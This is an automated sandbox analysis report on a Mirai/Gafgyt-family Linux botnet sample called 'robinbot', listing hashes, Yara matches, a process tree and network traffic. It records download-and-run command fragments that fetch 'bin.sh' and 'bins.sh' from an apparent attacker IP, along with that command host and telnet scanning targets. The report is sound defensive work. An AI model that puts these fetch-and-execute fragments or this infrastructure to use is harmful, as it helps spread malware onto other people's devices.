Edit tour

Linux Analysis Report
robinbot

Overview

General Information

Sample Name:	robinbot
Analysis ID:	756090
MD5:	500009d8f68330a8f82b59884a9afe47
SHA1:	575f5e6894b1a2f7a728435487666acdb9758f83
SHA256:	a46770913fba87921b56d789396e07cdfd68a846b2e80a77aa07e1c62f9304d6
Infos:

Detection

Mirai

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Sample deletes itself

Machine Learning detection for sample

Yara signature match

Sample contains strings that are potentially command strings

Uses the "uname" system call to query kernel version information (possible evasion)

Detected TCP or UDP traffic on non-standard ports

Sample and/or dropped files contains symbols with suspicious names

Sample listens on a socket

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756090
Start date and time:	2022-11-29 16:26:55 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 55s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	robinbot
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Detection:	MAL
Classification:	mal96.troj.evad.lin@0/2@0/0

Warnings

VT rate limit hit for: http://89.203.251.188/bin.sh;chmod
TCP Packets have been reduced to 100
VT rate limit hit for: http://89.203.251.188/bins.sh;chmod
VT rate limit hit for: http://89.203.251.188/bins.sh;sh
VT rate limit hit for: http://89.203.251.188/bins.sh;sh$

Runtime Messages

Command:	/tmp/robinbot
PID:	9446
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu1

robinbot (PID: 9446, Parent: 9378, MD5: unknown) Arguments: /tmp/robinbot

robinbot New Fork (PID: 9447, Parent: 9446)

robinbot New Fork (PID: 9448, Parent: 9447)

robinbot New Fork (PID: 9449, Parent: 9447)

robinbot New Fork (PID: 9450, Parent: 9447)

robinbot New Fork (PID: 9451, Parent: 9450)

upstart New Fork (PID: 9461, Parent: 3310)

sh (PID: 9461, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 9470, Parent: 9461)

date (PID: 9470, Parent: 9461, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 9472, Parent: 9461)

apport-checkreports (PID: 9472, Parent: 9461, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system

upstart New Fork (PID: 9488, Parent: 3310)

sh (PID: 9488, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 9490, Parent: 9488)

date (PID: 9490, Parent: 9488, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 9499, Parent: 9488)

apport-gtk (PID: 9499, Parent: 9488, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

upstart New Fork (PID: 9515, Parent: 3310)

sh (PID: 9515, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 9517, Parent: 9515)

date (PID: 9517, Parent: 9515, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 9532, Parent: 9515)

apport-gtk (PID: 9532, Parent: 9515, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
robinbot	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
robinbot	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x117db:$x2: /dev/misc/watchdog 0x117cd:$x3: /dev/watchdog 0x1605e:$s1: LCOGQGPTGP 0x15df9:$s3: CFOKLKQVPCVMP 0x15de1:$s4: QWRGPTKQMP 0x15d6c:$s5: HWCLVGAJ 0x15f25:$s6: NKQVGLKLE
robinbot	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
robinbot	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
robinbot	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
robinbot	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
robinbot	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xbeb0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
robinbot	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xc69f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
robinbot	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9352:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x948c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
robinbot	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0xf53a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
robinbot	Linux_Trojan_Gafgyt_d0c57a2e	unknown	unknown	0x10e32:$a: 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89
robinbot	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xc25f:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
robinbot	Linux_Trojan_Gafgyt_0cd591cd	unknown	unknown	0xaf92:$a: 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D
robinbot	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xc52a:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
robinbot	Linux_Trojan_Gafgyt_a33a8363	unknown	unknown	0xb18b:$a: 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E
robinbot	Linux_Trojan_Mirai_6a77af0f	unknown	unknown	0x60af:$a: 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41
robinbot	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x15d60:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
robinbot	Linux_Trojan_Mirai_95e0056c	unknown	unknown	0x15d90:$a: 50 46 00 13 10 11 16 17 00 57 51 47 50 00 52 43 51 51 00 43
robinbot	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x1c2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Click to see the 14 entries

Memory Dumps

Source	Rule	Description	Author	Strings
9449.1.0000000000400000.0000000000418000.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x117db:$x2: /dev/misc/watchdog 0x117cd:$x3: /dev/watchdog 0x1605e:$s1: LCOGQGPTGP 0x15df9:$s3: CFOKLKQVPCVMP 0x15de1:$s4: QWRGPTKQMP 0x15d6c:$s5: HWCLVGAJ 0x15f25:$s6: NKQVGLKLE
9449.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
9449.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
9449.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
9449.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xbeb0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xc69f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9352:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x948c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0xf53a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d0c57a2e	unknown	unknown	0x10e32:$a: 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xc25f:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_0cd591cd	unknown	unknown	0xaf92:$a: 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xc52a:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_a33a8363	unknown	unknown	0xb18b:$a: 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_6a77af0f	unknown	unknown	0x60af:$a: 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x15d60:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_95e0056c	unknown	unknown	0x15d90:$a: 50 46 00 13 10 11 16 17 00 57 51 47 50 00 52 43 51 51 00 43
9449.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x1c2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
9448.1.0000000000400000.0000000000418000.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x117db:$x2: /dev/misc/watchdog 0x117cd:$x3: /dev/watchdog 0x1605e:$s1: LCOGQGPTGP 0x15df9:$s3: CFOKLKQVPCVMP 0x15de1:$s4: QWRGPTKQMP 0x15d6c:$s5: HWCLVGAJ 0x15f25:$s6: NKQVGLKLE
9448.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
9448.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
9448.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
9448.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xbeb0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xc69f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9352:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x948c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0xf53a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d0c57a2e	unknown	unknown	0x10e32:$a: 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xc25f:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_0cd591cd	unknown	unknown	0xaf92:$a: 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xc52a:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_a33a8363	unknown	unknown	0xb18b:$a: 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_6a77af0f	unknown	unknown	0x60af:$a: 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x15d60:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_95e0056c	unknown	unknown	0x15d90:$a: 50 46 00 13 10 11 16 17 00 57 51 47 50 00 52 43 51 51 00 43
9448.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x1c2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
9446.1.0000000000400000.0000000000418000.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x117db:$x2: /dev/misc/watchdog 0x117cd:$x3: /dev/watchdog 0x1605e:$s1: LCOGQGPTGP 0x15df9:$s3: CFOKLKQVPCVMP 0x15de1:$s4: QWRGPTKQMP 0x15d6c:$s5: HWCLVGAJ 0x15f25:$s6: NKQVGLKLE
9446.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
9446.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
9446.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
9446.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xbeb0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xc69f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9352:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x948c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0xf53a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d0c57a2e	unknown	unknown	0x10e32:$a: 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xc25f:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_0cd591cd	unknown	unknown	0xaf92:$a: 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xc52a:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_a33a8363	unknown	unknown	0xb18b:$a: 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_6a77af0f	unknown	unknown	0x60af:$a: 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x15d60:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_95e0056c	unknown	unknown	0x15d90:$a: 50 46 00 13 10 11 16 17 00 57 51 47 50 00 52 43 51 51 00 43
9446.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x1c2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
9451.1.0000000000400000.0000000000418000.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x117db:$x2: /dev/misc/watchdog 0x117cd:$x3: /dev/watchdog 0x1605e:$s1: LCOGQGPTGP 0x15df9:$s3: CFOKLKQVPCVMP 0x15de1:$s4: QWRGPTKQMP 0x15d6c:$s5: HWCLVGAJ 0x15f25:$s6: NKQVGLKLE
9451.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
9451.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
9451.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
9451.1.0000000000400000.0000000000418000.r-x.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xbeb0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xc69f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9352:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x948c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0xf53a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_d0c57a2e	unknown	unknown	0x10e32:$a: 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xc25f:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_0cd591cd	unknown	unknown	0xaf92:$a: 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xc52a:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Gafgyt_a33a8363	unknown	unknown	0xb18b:$a: 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_6a77af0f	unknown	unknown	0x60af:$a: 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x15d60:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_95e0056c	unknown	unknown	0x15d90:$a: 50 46 00 13 10 11 16 17 00 57 51 47 50 00 52 43 51 51 00 43
9451.1.0000000000400000.0000000000418000.r-x.sdmp	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x1c2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Process Memory Space: robinbot PID: 9446	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: robinbot PID: 9446	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Process Memory Space: robinbot PID: 9448	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: robinbot PID: 9448	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Process Memory Space: robinbot PID: 9449	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: robinbot PID: 9449	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Process Memory Space: robinbot PID: 9451	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: robinbot PID: 9451	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Click to see the 79 entries

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: robinbot	ReversingLabs: Detection: 61%
Source: robinbot	Virustotal: Detection: 65%			Perma Link

Machine Learning detection for sample

Source: robinbot

Joe Sandbox ML: detected

Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 163.151.162.85:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 104.142.173.149:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 209.184.177.135:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 137.243.81.5:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 2.206.168.216:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 19.135.140.179:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 197.239.84.85:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 200.92.245.153:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 116.67.119.148:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 141.120.197.91:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 65.154.218.40:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 124.212.254.113:2323
Source: global traffic	TCP traffic: 192.168.2.20:40644 -> 187.127.3.105:8080
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 163.136.220.64:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 160.154.217.169:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 42.100.191.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 44.137.192.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:39792 -> 189.236.169.194:8080
Source: global traffic	TCP traffic: 192.168.2.20:43256 -> 89.203.251.188:7267
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 147.79.64.93:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 135.149.49.5:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 219.178.111.66:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 75.55.208.35:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 160.142.234.100:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 173.9.184.220:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 187.224.94.159:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 105.123.130.198:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 149.222.104.130:2323
Source: global traffic	TCP traffic: 192.168.2.20:15661 -> 200.214.123.249:2323
